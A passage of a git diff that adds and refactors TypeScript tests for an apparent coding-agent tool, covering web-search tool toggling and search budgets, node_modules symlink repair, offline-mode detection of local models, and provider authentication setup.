     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  // Cycle 1: Anthropic disables Brave tools
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+  assert.ok(!pi.getActiveTools().includes("search-the-web"), "Disabled after 1st Anthropic select");
+
+  // Cycle 1: switch away re-enables
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "openai", name: "gpt-4o" },
+    previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    source: "set",
+  });
+  let active = pi.getActiveTools();
+  assert.equal(
+    active.filter((t) => t === "search-the-web").length, 1,
+    "search-the-web exactly once after first re-enable"
+  );
+
+  // Cycle 2: Anthropic again
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: { provider: "openai", name: "gpt-4o" },
+    source: "set",
+  });
+
+  // Cycle 2: switch away again — must NOT accumulate duplicates
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "openai", name: "gpt-4o" },
+    previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    source: "set",
+  });
+  active = pi.getActiveTools();
+  assert.equal(
+    active.filter((t) => t === "search-the-web").length, 1,
+    "search-the-web exactly once after second re-enable (no duplicates)"
+  );
+  assert.equal(
+    active.filter((t) => t === "search_and_read").length, 1,
+    "search_and_read exactly once (no duplicates)"
+  );
+  assert.equal(
+    active.filter((t) => t === "google_search").length, 1,
+    "google_search exactly once (no duplicates)"
+  );
 });
 
 // ─── BUG-3 regression: mock fire() must call all handlers, not just first ───
@@ -862,6 +855,51 @@ test("MAX_NATIVE_SEARCHES_PER_SESSION is exported and equals 15", () => {
   assert.equal(MAX_NATIVE_SEARCHES_PER_SESSION, 15, "Session budget should be 15 (#1309)");
 });
 
+test("session search budget: survives context compaction (high-water mark)", async () => {
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  // First request: history has 12 web_search_tool_result blocks
+  const searchBlocks = Array.from({ length: 12 }, (_, i) => ({
+    type: "web_search_tool_result",
+    tool_use_id: `ws${i}`,
+    content: [],
+  }));
+
+  let payload: Record<string, unknown> = {
+    model: "claude-sonnet-4-6-20250514",
+    tools: [{ name: "bash", type: "custom" }],
+    messages: [{ role: "user", content: [{ type: "text", text: "search" }, ...searchBlocks] }],
+  };
+
+  await pi.fire("before_provider_request", { type: "before_provider_request", payload });
+  let tools = payload.tools as any[];
+  let nativeTool = tools.find((t: any) => t.type === "web_search_20250305");
+  assert.ok(nativeTool, "Should still inject web_search with 12/15 used");
+  assert.equal(nativeTool.max_uses, 3, "Should have 3 remaining (15 - 12)");
+
+  // Second request: context was compacted — search blocks gone from history.
+  // Without high-water mark, the budget would reset to 15.
+  payload = {
+    model: "claude-sonnet-4-6-20250514",
+    tools: [{ name: "bash", type: "custom" }],
+    messages: [{ role: "user", content: "compacted context — no search blocks" }],
+  };
+
+  await pi.fire("before_provider_request", { type: "before_provider_request", payload });
+  tools = payload.tools as any[];
+  nativeTool = tools.find((t: any) => t.type === "web_search_20250305");
+  assert.ok(nativeTool, "Should still inject web_search with 12/15 used (high-water mark)");
+  assert.equal(nativeTool.max_uses, 3, "High-water mark should preserve 12 — only 3 remaining");
+});
+
 // ─── stripThinkingFromHistory tests ─────────────────────────────────────────
 
 test("stripThinkingFromHistory removes thinking from earlier assistant messages", () => {
diff --git a/src/tests/node-modules-symlink.test.ts b/src/tests/node-modules-symlink.test.ts
index 4f2f2230e..ef0bdf724 100644
--- a/src/tests/node-modules-symlink.test.ts
+++ b/src/tests/node-modules-symlink.test.ts
@@ -4,113 +4,101 @@ import { existsSync, lstatSync, mkdirSync, mkdtempSync, readlinkSync, rmSync, sy
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 
-test("initResources creates node_modules symlink in agent dir", async () => {
+test("initResources creates node_modules symlink in agent dir", async (t) => {
   const { initResources } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-symlink-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    initResources(fakeAgentDir);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  initResources(fakeAgentDir);
 
-    const nodeModulesPath = join(fakeAgentDir, "node_modules");
-    // Use lstatSync instead of existsSync — existsSync follows the symlink and
-    // returns false for dangling symlinks (e.g. in worktrees without node_modules)
-    let stat;
-    try {
-      stat = lstatSync(nodeModulesPath);
-    } catch {
-      assert.fail("node_modules symlink should exist after initResources");
-    }
-    assert.equal(stat.isSymbolicLink(), true, "node_modules should be a symlink, not a real directory");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
+  const nodeModulesPath = join(fakeAgentDir, "node_modules");
+  // Use lstatSync instead of existsSync — existsSync follows the symlink and
+  // returns false for dangling symlinks (e.g. in worktrees without node_modules)
+  let stat;
+  try {
+    stat = lstatSync(nodeModulesPath);
+  } catch {
+    assert.fail("node_modules symlink should exist after initResources");
   }
+  assert.equal(stat.isSymbolicLink(), true, "node_modules should be a symlink, not a real directory");
 });
 
-test("initResources replaces a real directory blocking node_modules with a symlink", async () => {
+test("initResources replaces a real directory blocking node_modules with a symlink", async (t) => {
   const { initResources } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-symlink-realdir-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    // First call to set up agent dir structure
-    initResources(fakeAgentDir);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  // First call to set up agent dir structure
+  initResources(fakeAgentDir);
 
-    const nodeModulesPath = join(fakeAgentDir, "node_modules");
+  const nodeModulesPath = join(fakeAgentDir, "node_modules");
 
-    // Remove the symlink and replace with a real directory
-    rmSync(nodeModulesPath, { recursive: true, force: true });
-    mkdirSync(nodeModulesPath, { recursive: true });
+  // Remove the symlink and replace with a real directory
+  rmSync(nodeModulesPath, { recursive: true, force: true });
+  mkdirSync(nodeModulesPath, { recursive: true });
 
-    const statBefore = lstatSync(nodeModulesPath);
-    assert.equal(statBefore.isSymbolicLink(), false, "should be a real directory before fix");
-    assert.equal(statBefore.isDirectory(), true, "should be a real directory before fix");
+  const statBefore = lstatSync(nodeModulesPath);
+  assert.equal(statBefore.isSymbolicLink(), false, "should be a real directory before fix");
+  assert.equal(statBefore.isDirectory(), true, "should be a real directory before fix");
 
-    // Second call should replace the real directory with a symlink
-    initResources(fakeAgentDir);
+  // Second call should replace the real directory with a symlink
+  initResources(fakeAgentDir);
 
-    const statAfter = lstatSync(nodeModulesPath);
-    assert.equal(statAfter.isSymbolicLink(), true, "real directory should be replaced with symlink");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const statAfter = lstatSync(nodeModulesPath);
+  assert.equal(statAfter.isSymbolicLink(), true, "real directory should be replaced with symlink");
 });
 
-test("initResources replaces a stale symlink with a correct one", async () => {
+test("initResources replaces a stale symlink with a correct one", async (t) => {
   const { initResources } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-symlink-stale-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    // First call to set up agent dir structure
-    initResources(fakeAgentDir);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  // First call to set up agent dir structure
+  initResources(fakeAgentDir);
 
-    const nodeModulesPath = join(fakeAgentDir, "node_modules");
-    const correctTarget = readlinkSync(nodeModulesPath);
+  const nodeModulesPath = join(fakeAgentDir, "node_modules");
+  const correctTarget = readlinkSync(nodeModulesPath);
 
-    // Remove and replace with a stale symlink pointing to a non-existent path
-    unlinkSync(nodeModulesPath);
-    symlinkSync("/tmp/nonexistent-gsd-node-modules-" + Date.now(), nodeModulesPath);
+  // Remove and replace with a stale symlink pointing to a non-existent path
+  unlinkSync(nodeModulesPath);
+  symlinkSync("/tmp/nonexistent-gsd-node-modules-" + Date.now(), nodeModulesPath);
 
-    const staleTarget = readlinkSync(nodeModulesPath);
-    assert.notEqual(staleTarget, correctTarget, "stale symlink should point elsewhere");
+  const staleTarget = readlinkSync(nodeModulesPath);
+  assert.notEqual(staleTarget, correctTarget, "stale symlink should point elsewhere");
 
-    // Second call should fix the stale symlink
-    initResources(fakeAgentDir);
+  // Second call should fix the stale symlink
+  initResources(fakeAgentDir);
 
-    const fixedTarget = readlinkSync(nodeModulesPath);
-    assert.equal(fixedTarget, correctTarget, "stale symlink should be replaced with correct target");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const fixedTarget = readlinkSync(nodeModulesPath);
+  assert.equal(fixedTarget, correctTarget, "stale symlink should be replaced with correct target");
 });
 
-test("initResources replaces symlink whose target was deleted", async () => {
+test("initResources replaces symlink whose target was deleted", async (t) => {
   const { initResources } = await import("../resource-loader.ts");
   const tmp = mkdtempSync(join(tmpdir(), "gsd-symlink-missing-"));
   const fakeAgentDir = join(tmp, "agent");
 
-  try {
-    initResources(fakeAgentDir);
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+  initResources(fakeAgentDir);
 
-    const nodeModulesPath = join(fakeAgentDir, "node_modules");
-    const correctTarget = readlinkSync(nodeModulesPath);
+  const nodeModulesPath = join(fakeAgentDir, "node_modules");
+  const correctTarget = readlinkSync(nodeModulesPath);
 
-    // Create a symlink that points to a path that doesn't exist
-    // (simulates the case where npm upgrade moved the package location)
-    unlinkSync(nodeModulesPath);
-    const deadTarget = join(tmp, "old-install", "node_modules");
-    symlinkSync(deadTarget, nodeModulesPath);
+  // Create a symlink that points to a path that doesn't exist
+  // (simulates the case where npm upgrade moved the package location)
+  unlinkSync(nodeModulesPath);
+  const deadTarget = join(tmp, "old-install", "node_modules");
+  symlinkSync(deadTarget, nodeModulesPath);
 
-    // The symlink itself exists but its target doesn't
-    assert.equal(lstatSync(nodeModulesPath).isSymbolicLink(), true);
-    assert.equal(existsSync(deadTarget), false, "dead target should not exist");
+  // The symlink itself exists but its target doesn't
+  assert.equal(lstatSync(nodeModulesPath).isSymbolicLink(), true);
+  assert.equal(existsSync(deadTarget), false, "dead target should not exist");
 
-    initResources(fakeAgentDir);
+  initResources(fakeAgentDir);
 
-    const fixedTarget = readlinkSync(nodeModulesPath);
-    assert.equal(fixedTarget, correctTarget, "broken symlink should be replaced with correct target");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const fixedTarget = readlinkSync(nodeModulesPath);
+  assert.equal(fixedTarget, correctTarget, "broken symlink should be replaced with correct target");
 });
diff --git a/src/tests/non-extension-library.test.ts b/src/tests/non-extension-library.test.ts
index 70e1bcd4a..e263468b8 100644
--- a/src/tests/non-extension-library.test.ts
+++ b/src/tests/non-extension-library.test.ts
@@ -51,145 +51,124 @@ function isNonExtensionLibrary(resolvedPath: string): boolean {
 }
 
 describe('isNonExtensionLibrary — defense-in-depth for #1709', () => {
-  test('returns true for a file inside a directory with pi: {} (cmux pattern)', () => {
+  test('returns true for a file inside a directory with pi: {} (cmux pattern)', (t) => {
     const root = makeTempDir()
-    try {
-      const libDir = join(root, 'cmux')
-      mkdirSync(libDir)
-      writeFileSync(join(libDir, 'package.json'), JSON.stringify({
-        name: '@gsd/cmux',
-        description: 'cmux integration library — used by other extensions, not an extension itself',
-        pi: {}
-      }))
-      writeFileSync(join(libDir, 'index.js'), 'module.exports.utility = function() {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const libDir = join(root, 'cmux')
+    mkdirSync(libDir)
+    writeFileSync(join(libDir, 'package.json'), JSON.stringify({
+      name: '@gsd/cmux',
+      description: 'cmux integration library — used by other extensions, not an extension itself',
+      pi: {}
+    }))
+    writeFileSync(join(libDir, 'index.js'), 'module.exports.utility = function() {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(libDir, 'index.js')),
-        true,
-        'cmux with pi: {} should be identified as a non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(libDir, 'index.js')),
+      true,
+      'cmux with pi: {} should be identified as a non-extension library'
+    )
   })
 
-  test('returns true for pi.extensions as empty array', () => {
+  test('returns true for pi.extensions as empty array', (t) => {
     const root = makeTempDir()
-    try {
-      const libDir = join(root, 'lib-empty')
-      mkdirSync(libDir)
-      writeFileSync(join(libDir, 'package.json'), JSON.stringify({
-        name: 'lib-empty',
-        pi: { extensions: [] }
-      }))
-      writeFileSync(join(libDir, 'index.js'), 'module.exports.helper = function() {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const libDir = join(root, 'lib-empty')
+    mkdirSync(libDir)
+    writeFileSync(join(libDir, 'package.json'), JSON.stringify({
+      name: 'lib-empty',
+      pi: { extensions: [] }
+    }))
+    writeFileSync(join(libDir, 'index.js'), 'module.exports.helper = function() {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(libDir, 'index.js')),
-        true,
-        'pi: { extensions: [] } should be identified as non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(libDir, 'index.js')),
+      true,
+      'pi: { extensions: [] } should be identified as non-extension library'
+    )
   })
 
-  test('returns false for a directory without pi manifest (broken extension)', () => {
+  test('returns false for a directory without pi manifest (broken extension)', (t) => {
     const root = makeTempDir()
-    try {
-      const extDir = join(root, 'broken-ext')
-      mkdirSync(extDir)
-      writeFileSync(join(extDir, 'package.json'), JSON.stringify({
-        name: 'broken-ext'
-      }))
-      writeFileSync(join(extDir, 'index.js'), 'module.exports.notAFactory = function() {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const extDir = join(root, 'broken-ext')
+    mkdirSync(extDir)
+    writeFileSync(join(extDir, 'package.json'), JSON.stringify({
+      name: 'broken-ext'
+    }))
+    writeFileSync(join(extDir, 'index.js'), 'module.exports.notAFactory = function() {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(extDir, 'index.js')),
-        false,
-        'directory without pi manifest should NOT be identified as non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(extDir, 'index.js')),
+      false,
+      'directory without pi manifest should NOT be identified as non-extension library'
+    )
   })
 
-  test('returns false when pi.extensions declares actual entries', () => {
+  test('returns false when pi.extensions declares actual entries', (t) => {
     const root = makeTempDir()
-    try {
-      const extDir = join(root, 'declared-ext')
-      mkdirSync(extDir)
-      writeFileSync(join(extDir, 'package.json'), JSON.stringify({
-        name: 'declared-ext',
-        pi: { extensions: ['./index.js'] }
-      }))
-      writeFileSync(join(extDir, 'index.js'), 'module.exports.notAFactory = function() {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const extDir = join(root, 'declared-ext')
+    mkdirSync(extDir)
+    writeFileSync(join(extDir, 'package.json'), JSON.stringify({
+      name: 'declared-ext',
+      pi: { extensions: ['./index.js'] }
+    }))
+    writeFileSync(join(extDir, 'index.js'), 'module.exports.notAFactory = function() {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(extDir, 'index.js')),
-        false,
-        'directory with declared extensions should NOT be identified as non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(extDir, 'index.js')),
+      false,
+      'directory with declared extensions should NOT be identified as non-extension library'
+    )
   })
 
-  test('returns false when no package.json exists at all', () => {
+  test('returns false when no package.json exists at all', (t) => {
     const root = makeTempDir()
-    try {
-      const noManifest = join(root, 'no-manifest')
-      mkdirSync(noManifest)
-      writeFileSync(join(noManifest, 'index.js'), 'module.exports = {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const noManifest = join(root, 'no-manifest')
+    mkdirSync(noManifest)
+    writeFileSync(join(noManifest, 'index.js'), 'module.exports = {};')
 
-      // Should return false since there is no package.json with pi manifest
-      // (it will find the temp dir's absence of package.json and return false)
-      assert.equal(
-        isNonExtensionLibrary(join(noManifest, 'index.js')),
-        false,
-        'directory without any package.json should NOT be identified as non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    // Should return false since there is no package.json with pi manifest
+    // (it will find the temp dir's absence of package.json and return false)
+    assert.equal(
+      isNonExtensionLibrary(join(noManifest, 'index.js')),
+      false,
+      'directory without any package.json should NOT be identified as non-extension library'
+    )
   })
 
-  test('handles malformed package.json gracefully', () => {
+  test('handles malformed package.json gracefully', (t) => {
     const root = makeTempDir()
-    try {
-      const badDir = join(root, 'bad-json')
-      mkdirSync(badDir)
-      writeFileSync(join(badDir, 'package.json'), 'not valid json {{{')
-      writeFileSync(join(badDir, 'index.js'), 'module.exports = {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const badDir = join(root, 'bad-json')
+    mkdirSync(badDir)
+    writeFileSync(join(badDir, 'package.json'), 'not valid json {{{')
+    writeFileSync(join(badDir, 'index.js'), 'module.exports = {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(badDir, 'index.js')),
-        false,
-        'malformed package.json should not cause a crash and should return false'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(badDir, 'index.js')),
+      false,
+      'malformed package.json should not cause a crash and should return false'
+    )
   })
 
-  test('pi manifest with other fields but no extensions still opts out', () => {
+  test('pi manifest with other fields but no extensions still opts out', (t) => {
     const root = makeTempDir()
-    try {
-      const libDir = join(root, 'lib-with-skills')
-      mkdirSync(libDir)
-      writeFileSync(join(libDir, 'package.json'), JSON.stringify({
-        name: 'lib-with-skills',
-        pi: { skills: ['./my-skill.md'] }
-      }))
-      writeFileSync(join(libDir, 'index.js'), 'module.exports.helper = function() {};')
+    t.after(() => rmSync(root, { recursive: true, force: true }));
+    const libDir = join(root, 'lib-with-skills')
+    mkdirSync(libDir)
+    writeFileSync(join(libDir, 'package.json'), JSON.stringify({
+      name: 'lib-with-skills',
+      pi: { skills: ['./my-skill.md'] }
+    }))
+    writeFileSync(join(libDir, 'index.js'), 'module.exports.helper = function() {};')
 
-      assert.equal(
-        isNonExtensionLibrary(join(libDir, 'index.js')),
-        true,
-        'pi manifest with skills but no extensions should be identified as non-extension library'
-      )
-    } finally {
-      rmSync(root, { recursive: true, force: true })
-    }
+    assert.equal(
+      isNonExtensionLibrary(join(libDir, 'index.js')),
+      true,
+      'pi manifest with skills but no extensions should be identified as non-extension library'
+    )
   })
 })
diff --git a/src/tests/offline-mode.test.ts b/src/tests/offline-mode.test.ts
new file mode 100644
index 000000000..07c19b642
--- /dev/null
+++ b/src/tests/offline-mode.test.ts
@@ -0,0 +1,165 @@
+/**
+ * Offline mode support tests.
+ *
+ * Covers:
+ * - isLocalModel() detection for local vs cloud URLs
+ * - isAllLocalChain() aggregate check
+ * - Auto-detection sets PI_OFFLINE when all models are local
+ * - Validation rejects remote models with --offline flag
+ * - Network error codes in INFRA_ERROR_CODES
+ * - Web search tool filtered when PI_OFFLINE is set
+ *
+ * Fixes #2341
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { isLocalModel } from "../../packages/pi-coding-agent/src/core/local-model-check.ts";
+
+// ─── isLocalModel ───────────────────────────────────────────────────────────
+
+test("isLocalModel returns true for localhost", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "http://localhost:11434" })), true);
+});
+
+test("isLocalModel returns true for 127.0.0.1", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "http://127.0.0.1:8080/v1" })), true);
+});
+
+test("isLocalModel returns true for 0.0.0.0", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "http://0.0.0.0:1234" })), true);
+});
+
+test("isLocalModel returns true for ::1 (IPv6 loopback)", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "http://[::1]:11434" })), true);
+});
+
+test("isLocalModel returns true for unix socket path", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "unix:///var/run/ollama.sock" })), true);
+});
+
+test("isLocalModel returns false for api.anthropic.com", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "https://api.anthropic.com" })), false);
+});
+
+test("isLocalModel returns false for api.openai.com", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "https://api.openai.com/v1" })), false);
+});
+
+test("isLocalModel returns false when no baseUrl (empty string = cloud)", () => {
+	assert.strictEqual(isLocalModel(fakeModel({ baseUrl: "" })), false);
+});
+
+// ─── isAllLocalChain (source-level check) ───────────────────────────────────
+
+test("isAllLocalChain returns true when all models are local (logic check)", () => {
+	const models = [
+		fakeModel({ baseUrl: "http://localhost:11434/v1" }),
+		fakeModel({ baseUrl: "http://127.0.0.1:8080" }),
+	];
+	assert.strictEqual(models.every((m) => isLocalModel(m)), true);
+});
+
+test("isAllLocalChain returns false when mixed local and remote", () => {
+	const models = [
+		fakeModel({ baseUrl: "http://localhost:11434/v1" }),
+		fakeModel({ baseUrl: "https://api.anthropic.com" }),
+	];
+	assert.strictEqual(models.every((m) => isLocalModel(m)), false);
+});
+
+test("isAllLocalChain returns false for empty list", () => {
+	const models: Array<{ baseUrl: string }> = [];
+	// Empty => false (no models means we can't guarantee local)
+	assert.strictEqual(models.length === 0 ? false : models.every((m) => isLocalModel(m)), false);
+});
+
+// ─── INFRA_ERROR_CODES includes network errors ─────────────────────────────
+
+test("INFRA_ERROR_CODES includes ECONNREFUSED", async () => {
+	const { INFRA_ERROR_CODES } = await import(
+		"../../src/resources/extensions/gsd/auto/infra-errors.ts"
+	);
+	assert.strictEqual(INFRA_ERROR_CODES.has("ECONNREFUSED"), true);
+});
+
+test("INFRA_ERROR_CODES includes ENOTFOUND", async () => {
+	const { INFRA_ERROR_CODES } = await import(
+		"../../src/resources/extensions/gsd/auto/infra-errors.ts"
+	);
+	assert.strictEqual(INFRA_ERROR_CODES.has("ENOTFOUND"), true);
+});
+
+test("INFRA_ERROR_CODES includes ENETUNREACH", async () => {
+	const { INFRA_ERROR_CODES } = await import(
+		"../../src/resources/extensions/gsd/auto/infra-errors.ts"
+	);
+	assert.strictEqual(INFRA_ERROR_CODES.has("ENETUNREACH"), true);
+});
+
+// ─── isInfrastructureError detects network errors in offline mode ───────────
+
+test("isInfrastructureError returns code for ECONNREFUSED when offline", async () => {
+	const { isInfrastructureError } = await import(
+		"../../src/resources/extensions/gsd/auto/infra-errors.ts"
+	);
+	const savedOffline = process.env.PI_OFFLINE;
+	process.env.PI_OFFLINE = "1";
+	try {
+		const err = Object.assign(new Error("connect ECONNREFUSED"), { code: "ECONNREFUSED" });
+		assert.strictEqual(isInfrastructureError(err), "ECONNREFUSED");
+	} finally {
+		if (savedOffline === undefined) delete process.env.PI_OFFLINE;
+		else process.env.PI_OFFLINE = savedOffline;
+	}
+});
+
+// ─── Web search filtering when PI_OFFLINE set ──────────────────────────────
+
+test("web search tool is filtered when PI_OFFLINE is set", async () => {
+	const { readFileSync } = await import("node:fs");
+	const { join } = await import("node:path");
+
+	const toolExecPath = join(
+		process.cwd(),
+		"packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts",
+	);
+	const content = readFileSync(toolExecPath, "utf-8");
+	assert.ok(
+		content.includes("PI_OFFLINE") && content.includes("web_search"),
+		"tool-execution.ts should check PI_OFFLINE for web_search",
+	);
+
+	const chatControllerPath = join(
+		process.cwd(),
+		"packages/pi-coding-agent/src/modes/interactive/controllers/chat-controller.ts",
+	);
+	const chatContent = readFileSync(chatControllerPath, "utf-8");
+	assert.ok(
+		chatContent.includes("PI_OFFLINE") && chatContent.includes("webSearchResult"),
+		"chat-controller.ts should check PI_OFFLINE for webSearchResult",
+	);
+});
+
+// ─── Version check skipped when PI_OFFLINE ─────────────────────────────────
+
+test("version check is skipped when PI_OFFLINE is set", async () => {
+	const { readFileSync } = await import("node:fs");
+	const { join } = await import("node:path");
+
+	const interactivePath = join(
+		process.cwd(),
+		"packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts",
+	);
+	const content = readFileSync(interactivePath, "utf-8");
+	assert.ok(
+		content.includes("PI_OFFLINE"),
+		"interactive-mode.ts should check PI_OFFLINE for version check skip",
+	);
+});
+
+// ─── Helper ─────────────────────────────────────────────────────────────────
+
+function fakeModel(overrides: Partial<{ baseUrl: string }> = {}): { baseUrl: string } {
+	return { baseUrl: overrides.baseUrl ?? "" };
+}
diff --git a/src/tests/pi-ai-event-stream-factory.test.ts b/src/tests/pi-ai-event-stream-factory.test.ts
new file mode 100644
index 000000000..e43b1df64
--- /dev/null
+++ b/src/tests/pi-ai-event-stream-factory.test.ts
@@ -0,0 +1,14 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import {
+	AssistantMessageEventStream,
+	createAssistantMessageEventStream,
+} from "@gsd/pi-ai";
+
+describe("@gsd/pi-ai event stream exports", () => {
+	it("exports createAssistantMessageEventStream for package consumers", () => {
+		assert.equal(typeof createAssistantMessageEventStream, "function");
+		const stream = createAssistantMessageEventStream();
+		assert.ok(stream instanceof AssistantMessageEventStream);
+	});
+});
diff --git a/src/tests/postinstall.test.ts b/src/tests/postinstall.test.ts
index 88b8e0a47..ff655529e 100644
--- a/src/tests/postinstall.test.ts
+++ b/src/tests/postinstall.test.ts
@@ -9,7 +9,11 @@ const projectRoot = join(dirname(fileURLToPath(import.meta.url)), "..", "..");
 test("postinstall respects PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD", () => {
   const result = spawnSync("node", ["scripts/postinstall.js"], {
     cwd: projectRoot,
-    env: { ...process.env, PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD: "1" },
+    env: {
+      ...process.env,
+      PLAYWRIGHT_SKIP_BROWSER_DOWNLOAD: "1",
+      GSD_SKIP_RTK_INSTALL: "1",
+    },
     encoding: "utf-8",
   });
 
diff --git a/src/tests/provider-auth-setup.test.ts b/src/tests/provider-auth-setup.test.ts
new file mode 100644
index 000000000..26b9ff4c1
--- /dev/null
+++ b/src/tests/provider-auth-setup.test.ts
@@ -0,0 +1,43 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+
+const { getProviderSetupAction } = await import(
+	"../../packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts"
+);
+
+test("routes OAuth providers to the login dialog", () => {
+	const action = getProviderSetupAction({
+		provider: "github-copilot",
+		authMode: "oauth",
+		hasAuth: false,
+	});
+
+	assert.deepEqual(action, { kind: "oauth-login" });
+});
+
+test("keeps API-key providers out of the OAuth login flow", () => {
+	for (const provider of ["alibaba-coding-plan", "zai", "xai"]) {
+		const action = getProviderSetupAction({
+			provider,
+			authMode: "apiKey",
+			hasAuth: false,
+		});
+
+		assert.equal(action.kind, "status");
+		assert.match(action.message, /API-key auth, not OAuth/);
+		assert.match(action.message, new RegExp(provider));
+	}
+});
+
+test("tells already-configured API-key providers to use model selection", () => {
+	const action = getProviderSetupAction({
+		provider: "xai",
+		authMode: "apiKey",
+		hasAuth: true,
+	});
+
+	assert.deepEqual(action, {
+		kind: "status",
+		message: "xai already has credentials configured. Use /model to select it.",
+	});
+});
diff --git a/src/tests/provider-help-text.test.ts b/src/tests/provider-help-text.test.ts
new file mode 100644
index 000000000..e66b9b3a6
--- /dev/null
+++ b/src/tests/provider-help-text.test.ts
@@ -0,0 +1,22 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+// Validate that help-text.ts includes updated provider references
+const { printSubcommandHelp } = await import("../../dist/help-text.js");
+
+describe("help-text provider references", () => {
+  it("config help mentions OpenRouter and Ollama", () => {
+    const lines: string[] = [];
+    const origWrite = process.stdout.write.bind(process.stdout);
+    (process.stdout as any).write = (chunk: string) => { lines.push(chunk); return true; };
+    try {
+      printSubcommandHelp("config", "0.0.0");
+    } finally {
+      (process.stdout as any).write = origWrite;
+    }
+    const text = lines.join("");
+    assert.ok(text.includes("OpenRouter"), "OpenRouter should be mentioned in config help");
+    assert.ok(text.includes("Ollama"), "Ollama should be mentioned in config help");
+    assert.ok(text.includes("docs/providers.md"), "providers.md reference should be in config help");
+  });
+});
diff --git a/src/tests/provider-manager-enter-key.test.ts b/src/tests/provider-manager-enter-key.test.ts
new file mode 100644
index 000000000..ada68f245
--- /dev/null
+++ b/src/tests/provider-manager-enter-key.test.ts
@@ -0,0 +1,46 @@
+/**
+ * Regression test for #3579 — Enter key initiates auth setup in provider manager
+ *
+ * The provider manager component did not handle the Enter key, leaving users
+ * unable to initiate auth setup without knowing the 'd' keyboard shortcut.
+ * The fix adds a selectConfirm handler that calls onSetupAuth.
+ *
+ * Structural verification test — reads source to confirm selectConfirm handler
+ * and onSetupAuth callback exist in provider-manager.ts.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(
+  join(__dirname, '..', '..', 'packages', 'pi-coding-agent', 'src', 'modes', 'interactive', 'components', 'provider-manager.ts'),
+  'utf-8',
+);
+
+describe('provider manager Enter key handler (#3579)', () => {
+  test('onSetupAuth callback property exists', () => {
+    assert.match(source, /onSetupAuth/,
+      'onSetupAuth callback should be defined');
+  });
+
+  test('selectConfirm key handler exists', () => {
+    assert.match(source, /selectConfirm/,
+      'selectConfirm key binding should be handled');
+  });
+
+  test('onSetupAuth is called with provider name', () => {
